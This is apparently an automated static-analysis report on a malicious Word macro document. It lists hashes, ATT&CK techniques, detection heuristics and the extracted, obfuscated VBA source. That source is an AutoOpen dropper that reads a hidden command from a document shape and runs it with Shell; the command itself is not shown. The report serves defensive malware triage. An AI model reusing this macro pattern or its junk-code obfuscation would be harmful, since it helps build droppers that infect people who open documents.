Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 d7903bf49f6fbfea…

MALICIOUS

Office (OLE)

145.9 KB Created: 2018-12-06 13:30:00 Authoring application: Microsoft Office Word First seen: 2019-01-12
MD5: ad55100835675443607e0f7ef0e373e1 SHA-1: 99cd49d21f87631fa9e17ada342979e7b13c06e1 SHA-256: d7903bf49f6fbfea4015dbe25e3e5cabe84ae5ebfc5cd46ecb1e6982451b0c65
292 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059.001 PowerShell T1059.003 Windows Command Shell T1204.002 Malicious File

The sample contains VBA macros with an autoopen subroutine that executes a command. This command invokes cmd.exe with obfuscated arguments, likely to download and execute a second-stage payload. The presence of `cmd.exe` and `PowerShell` heuristics, along with the `Shell()` call in VBA, strongly suggests a downloader or dropper functionality.

Heuristics 10

  • ClamAV: Doc.Downloader.Generic-6775095-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Generic-6775095-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    uiBUVSz = Array(idGDO, WtQuYwhn, ViQjsXkFP, Interaction _
.Shell(CSAZJvk, wscjbAitL), XCwmMmz)
   SFSYPwIRqmUfMzzw = 176977750 * CInt(64503016) + oJobFwIrcNzLwhfvEaN + CLng(301170968 + Sgn(CtQfKjZHMFBAEu) - 26345383 * 197223907) - MaHGfDqbWwjBtXNQZmPX + Chr(uRijQIwKumbRaNnmuWpaDois) * 39008609 / CStr(124564583) / (okiIoGiSIYWPvsQbMFkSJ / 172662247 / iPZzrFjpdzbJZQinLrvi / Fix(XHuinNWnVAYOHzsO + Hex(qMZjsRTirKiSZaN) + 315743360 + CBool(101954409 + IiPEsNCIzDvSRlY)))
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Attribute VB_Customizable = True
Sub autoopen()
ncVsVTHaT
  • Suspicious cmd.exe invocation with execution flag high SC_STR_CMD
    Suspicious cmd.exe invocation with execution flag
  • Reference to PowerShell high SC_STR_POWERSHELL
    Reference to PowerShell
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 8887 bytes
SHA-256: 7a97a190eb03e26e51363053bffae5e8dca2feccf7bb478488ee876f34b7be99
Detection
ClamAV: No threats found
Obfuscation or payload: likely
218 of 250 identifiers look randomly generated (e.g. 'fOHqDuKmpdCOkjLXUJcaWtmI') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "UvKqKRozCsGcrp"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub autoopen()
ncVsVTHaT
End Sub

Attribute VB_Name = "zlcRziIlwY"
Function ncVsVTHaT()
On Error Resume Next
   OzSkrdObFrnwwIssEpjR = 45514226 * CInt(298815415) + uaSbUuSLKUswnVLJbBcs + CLng(242928576 + Sgn(SpCUVtlddWVUXKZCtjmjddF) - 63747085 * 31550037) - tfIPiAsAHcYzZZZhrV + Chr(TzAjZHwFEPojtPzzGVNs) * 138721771 / CStr(181926332) / (CwduHNGwmjjkYtviIh / 306658841 / kTtfjaaTLidIsawnwMpswT / Fix(AMfaGKmEKanmjD + Hex(KjmmkHGYszuImvsBpRQtSEzU) + 60447378 + CBool(167910243 + ShEoPjwCIGMjuuomcLC)))
   vkjLINiVRVnYIfKkvJDYcah = 125010518 * CInt(280413707) + CwwLwVjVNcFtPoQ + CLng(307150616 + Sgn(QOJLqEhAzNCRVDNU) - 19193102 * 73236067) - WFWRpmRhfCuPHhNQEhtMs + Chr(LBIjEsZrYMdiXHtzT) * 170240974 / CStr(161256259) / (BzDwujHmJnJwqFuVII / 219163755 / IodhlZKGWGNTnVQNzJm / Fix(lmhlDirSMYpLszOMTV + Hex(VZBPDZpKVohXwWLo) + 144046248 + CBool(45181206 + iHhrtwRCboHDtczQwjXiLNT)))
   jCczUGPhjCsadYbwRUSUA = 275601950 * CInt(5782118) + ZzJOaVjAKzQwLGqdftqcb + CLng(65906150 + Sgn(wBuBdrEjtBrXWwAHKVsQi) - 56342579 * 201294643) - LdooHzYJPPKNjUDJFSWvU + Chr(UhimjHjtDqWJpzCQZudiI) * 46032169 / CStr(250102843) / (apRiKMmjQdJHKVTRaVMUqW / 206415924 / HptbSlaNvrLqpA / Fix(rEntMpuFDbLImuRwEKNaV + Hex(KQiCwMTKdbZnVQDdT) + 93537167 + CBool(88949106 + pAGcnSduHfbZNYtWOJthm)))
   zOqAjjZadMLhijpiH = 258967966 * CInt(53298061) + jGWWJZnzDnUCPFihEBn + CLng(69059747 + Sgn(TzpUHzfkMbZEUfrsU) - 289329702 * 66906578) - aXqrJRYwIdGzzKPHjCCbHOqL + Chr(wvZqpkJdOpwIzKpYhciVZGJ) * 107471162 / CStr(239751116) / (RpioLjfwLVwHStzW / 231828153 / TwirMDalIpVrmJGdST / Fix(adPdBzTZZKoXDXowmdadiNa + Hex(pbTjpAobibJrEUhrtiB) + 176793883 + CBool(132574133 + STwMUArqQMDroZfjk)))
   OhdVmvLAnJIWlQlh = 228867848 * CInt(275954256) + wTzIFuKJrfUEccMCTfkhB + CLng(92683901 + Sgn(IShMmwVROdwftRYYab) - 250447455 * 128506808) - TFfuZOSCwIjkzpqYiX + Chr(WNFadwSkuGJFPuzp) * 85080677 / CStr(13876932) / (NhCPQUSvtciAsEYwH / 87724133 / BzGdXvoDQqCzdWQKfTwp / Fix(LBZIMGQBrzqbiAU + Hex(EfUbRBFrcFdcusc) + 59980146 + CBool(159360828 + qwjUKoYCZsLXuVvCboi)))
Set NtcOwsR = UvKqKRozCsGcrp.Shapes(ikAMzDXIz + "rruOGdOoNsmDO" + cjnjoKwo).TextFrame
   toQVhQBZrEzmnwuIzE = 200686599 * CInt(183687680) + hUEtTHYwiuwOElNYkvikimSh + CLng(277700078 + Sgn(OpTQWimZLTLbOIc) - 191220805 * 84352533) - BXiMjkMJwrSvCWDL + Chr(idOYTcfatMJhZIBZIjSZBIi) * 24911004 / CStr(81771799) / (uGPRoYDPtzwlivDmnYDcX / 229500016 / WuqllravKMkhYKcXk / Fix(JPBaWzWVOVJAjLMptWzn + Hex(XTEoZzOicLBTwNTPv) + 159148569 + CBool(298735367 + QdElKcYViQFZwMmvw)))
   kIdiaitzkZOqfLlkWdSYoso = 117107137 * CInt(111076975) + fJPJqSwlNzOzCXYUYFWzrO + CLng(135084472 + Sgn(YTjuGrTLRoCjia) - 230692193 * 318270433) - tzmVWbuAUUivTuQpOlXlDfW + Chr(DiOVolzWaFzRifBrmumX) * 239003435 / CStr(107858353) / (umuTpLKoObFRoMZMiWMUNwzG / 234561732 / fwJtzwmjUjtSILPRjqcNM / Fix(NiEAYvlzmnjFfMfUbJfF + Hex(pSPOAFwNIdWXAlbpwYrwWwF) + 228167651 + CBool(14959570 + DlOOTiHmXPomXppjiJNi)))
   aHDjOPStZntcrjWzUauJSaWR = 60722321 * CInt(82238729) + CGSAtfUzVGZjwhMUi + CLng(262792271 + Sgn(lwsYKGwfhAkmXBAPn) - 46799597 * 261338164) - zWmBtvuzbFFodqbQJiHtvzmw + Chr(TBiwSZNuoVOLriOMADcvv) * 56392140 / CStr(214394167) / (kFFzuDzkpPZtPBJfrup / 139641474 / ESDtjuvKApLVEMMU / Fix(AkYdVbFUwzuwDBTLN + Hex(nBGNJBZpZOYLpzLduEzj) + 229568975 + CBool(279069934 + YkvBOzorJqjYSImbWEjCrwlJ)))
   kzZTQNsiRklzibQLsUZcQ = 61166426 * CInt(178655430) + OwjJtlzOiChwvAjPpESwIDh + CLng(16605141 + Sgn(vihNCTaYfESdikjmXTjtU) - 104646983 * 290810013) - KmMqckLRjXwDQAciGYQvR + Chr(HTmLlkBIRfpwDPHkvvtBw) * 72578757 / CStr(252865808) / (WWqzmvzwUYftEQzbQYFS / 86380621 / zNbWcUCQowjIpOtDVV / Fix(tcijOjiwSkYFTQCZdWQT + Hex(uEjjMvbkhMCjnTrSdMqz) + 159080739 + CBool(239278439 + QqNrmoPhFCAzYuACkDLk)))
   dIwaPubEjKzWUHoXKTcDU = 282401574 * CInt(805435) + wPnszGzajqpAdTq + CLng(201237253 + Sgn(pvTrDIAijKEjnMmIr) - 182016097 * 341383169) - iFaKYndSotrczof + Chr(jOvGmOPwvrviCrlrqXjjVITQ) * 207885165 / CStr(227430623) / (pSblzhrcdjsUTqiPjrwPwI / 340725701 / ZHwaXvfbEYZdUGwzLPHLzD / Fix(trtnYjTtjToLrkRE + Hex(BRPvQAvauBDjBooWuDjiH) + 41042872 + CBool(307027704 + ftKfuEMuLZKfnScqzNifP)))
CSAZJvk = NtcOwsR.ContainingRange + iPXqQf + zpzhhaa + IVbiJica + ucPVSNf + GiMlz + qGrEAqGV + JCFzh + tjSHIzJL + UtwMoZP + jKwkcPA + fozlX + SwBAFwoz
   aaLziYhMkBSlOQIIE = 115862557 * CInt(129558669) + ZUiczihplTCwYoKRcTOnD + CLng(341651089 + Sgn(aYnSJzGaSzfpGviwErraRwV) - 89446797 * 170492937) - rflCjfZaEEMLYsf + Chr(jwswEVuUKwLYcbCZsCFboPR) * 342099788 / CStr(105447977) / (qdlsTzvXOWVbCVkQskTA / 328821561 / CmTVmDEThsiYiRjRcMdE / Fix(fEQzkqXXhjPhNazZ + Hex(MrTvpctiqThaHHXtQWhCVCMh) + 317217380 + CBool(1946161 + TrRqksfAllRqcXVu)))
   BdGtlOSSrIaNquO = 309421902 * CInt(266646865) + CRmwNHBwwLBfSmbwAccATF + CLng(102743501 + Sgn(GHPXlBjWiRjfWCQzsoR) - 43067274 * 110336855) - qomutlSoVzCKsFrd + Chr(ubiBAFwazMdHinJL) * 305140192 / CStr(108790538) / (lqHzEqwjcLKKHOdWimK / 278957633 / qTwZojrJtzzpQsUndaKEW / Fix(OmBVsBQiZjasvWLYPJ + Hex(ZjMNVrWIjBLAmLW) + 35434455 + CBool(65706626 + TnqtOaOPXzzbFLBzzjB)))
   VusOzSFjwXLrbCpvzOcwk = 35566909 * CInt(280253549) + LYQfIjithRmuwkcVWWVO + CLng(51307086 + Sgn(bnRDSnjzwPENDZBaXRsR) - 66306254 * 70710847) - vwOlHcNjbWjwdOEOr + Chr(hSXqlhDTvzEWpVQY) * 143761385 / CStr(50865406) / (BbWlfcrWcYLSDA / 53732684 / ssELhinjOfFjLjEszKq / Fix(LhrNtKavkjAVhsYjQwWSo + Hex(WzXKLwTTVsJaRKArRWIrwh) + 204075052 + CBool(234217038 + SHYbAoYtUKrqjzicRKILHbNf)))
   wGSUoJmLdSjJZbVBEITFRH = 261842397 * CInt(161902735) + sLujbRbwzBjKjhhOsjziVDz + CLng(316356192 + Sgn(nEQcWpSubwwriCBE) - 84075508 * 171922282) - oqYamrYYnqXpMwSnMLU + Chr(MNQEliXOjwdIdZHWPdik) * 325337762 / CStr(109571903) / (DEHmsMOotswNaaTpDUKr / 272773505 / OMmrvYjhjfviMAiw / Fix(BSJjQjMjwwoaQmZpppvz + Hex(QqFLIQRrNTLGqI) + 164380799 + CBool(207841533 + zfaKzcuGTtWtWKizclcE)))
   FBfJTjaPBtVboDcGAj = 147438361 * CInt(83439857) + NcQhnIsfJrPsvLaPV + CLng(190025953 + Sgn(uEfsMqpJMTBzku) - 34811894 * 295323610) - PbjahjrBGitsBqiDVSK + Chr(jDrzzjMIsizqSAAuwZNUo) * 283221564 / CStr(44882378) / (wQLcXvOcuLqLkjb / 7898004 / jIblCZApkGwEqsswjA / Fix(UjkwQVvGKoJNwMzEifWuq + Hex(nmpSXESzPAjsjnwL) + 72481360 + CBool(106184967 + TpAatwstoKRNGrJ)))
   zcfjORwPTCvDpzOXjVi = 246707003 * CInt(326350421) + RoiFjRzRKfUcYMiQ + CLng(77182211 + Sgn(YnEDtdjqpDqJjl) - 182565694 * 260664637) - rzJljSCrPiNbCoSK + Chr(MKEOvFVqbuaBviAkCrS) * 16708159 / CStr(123397696) / (UCLdvWPnOYzJZRiwvsnuFYb / 280219393 / zMqzzzHHUpCCRJzbnj / Fix(BmJjBGvaPYmwbU + Hex(wKYnQYsBEbjtijoT) + 114267076 + CBool(289818764 + phpcptCZsjitbhHNoDA)))
Const wscjbAitL = 0
   fOHqDuKmpdCOkjLXUJcaWtmI = 10867059 * CInt(128118882) + nSaIZwdwQVlNMcZj + CLng(168669206 + Sgn(hjRunczmAclcwojhXUOUcP) - 42964733 * 227347044) - CiwQwwNMTTjusfwLmwBMnWz + Chr(iEFRFMRdjzktBWCfYPiU) * 1915317 / CStr(258368993) / (pQJpRFVHjlSltrvHHBGL / 299996313 / FJQwVoXrcdraQBwWAYNrEHi / Fix(IocIWSucluKzZVjjjoJpt + Hex(buKlBizBpzainhMOVJ) + 230394333 + CBool(101449935 + VqwziojHQwsrpMiwlRLijF)))
   TXlUOtTTrAqrTALMG = 22976151 * CInt(228594843) + CwuVzPtSvIXPjqJ + CLng(244688943 + Sgn(CiilWZiiZfQajITADQUd) - 100613118 * 137237701) - zBXjcbLdrakDUAVfZPqajcrP + Chr(EOcaoHNhjijwqCDNBZAvFwzh) * 237659112 / CStr(310806275) / (YuOXKHjXMiCDSXWl / 121348056 / hjNnMiDqTuGOuqtuonULZr / Fix(irfzWiYiNhwDLzl + Hex(jUTnpRznMJYiiQHMpdjwh) + 230623503 + CBool(214942209 + vLthwnhuDGoqFDQ)))
uiBUVSz = Array(idGDO, WtQuYwhn, ViQjsXkFP, Interaction _
.Shell(CSAZJvk, wscjbAitL), XCwmMmz)
   SFSYPwIRqmUfMzzw = 176977750 * CInt(64503016) + oJobFwIrcNzLwhfvEaN + CLng(301170968 + Sgn(CtQfKjZHMFBAEu) - 26345383 * 197223907) - MaHGfDqbWwjBtXNQZmPX + Chr(uRijQIwKumbRaNnmuWpaDois) * 39008609 / CStr(124564583) / (okiIoGiSIYWPvsQbMFkSJ / 172662247 / iPZzrFjpdzbJZQinLrvi / Fix(XHuinNWnVAYOHzsO + Hex(qMZjsRTirKiSZaN) + 315743360 + CBool(101954409 + IiPEsNCIzDvSRlY)))
   wLqvdHpYBEHJBD = 43898073 * CInt(4620008) + CpznwUZIRwIwbsM + CLng(232659526 + Sgn(PqvqjvVCuIhfTcVPPtHh) - 109217405 * 4572427) - RmLIhaZMuaXnQERWtdlBLrd + Chr(WnjMzEBNPziEUmobUwmFwoEK) * 329101599 / CStr(151813215) / (EizfZJNmurNMqYJY / 110705975 / NBHoKjOFXBhiZOcqziQ / Fix(EuGAukHjwjmQojkVGP + Hex(SQUlMELRzkzbbIwWSu) + 45748773 + CBool(305812211 + ZfJrPRupdGjiNwDkJuv)))
   iOrCToQFtMUKJhFOvj = 337729079 * CInt(121384757) + XwKiWGGJKoNBiZMItHzwtna + CLng(189333851 + Sgn(NjiBlQMniLSjXwhJvjXGIaI) - 296278276 * 37361282) - YBUzjWhkIXcIZY + Chr(OEOtbWKQozEDVl) * 257476378 / CStr(179185581) / (vjrKSjbwznoJhmKwFuWuz / 196660489 / NljzfSLwVwqNphqvXmzc / Fix(WGGLuEPrQhmREiZmhvdnp + Hex(NqZURPwzHCBwqfZol) + 95042219 + CBool(314708117 + FPEvkDRJprTotEt)))
End Function

Open this report in the interactive analyzer, or submit your own file for analysis.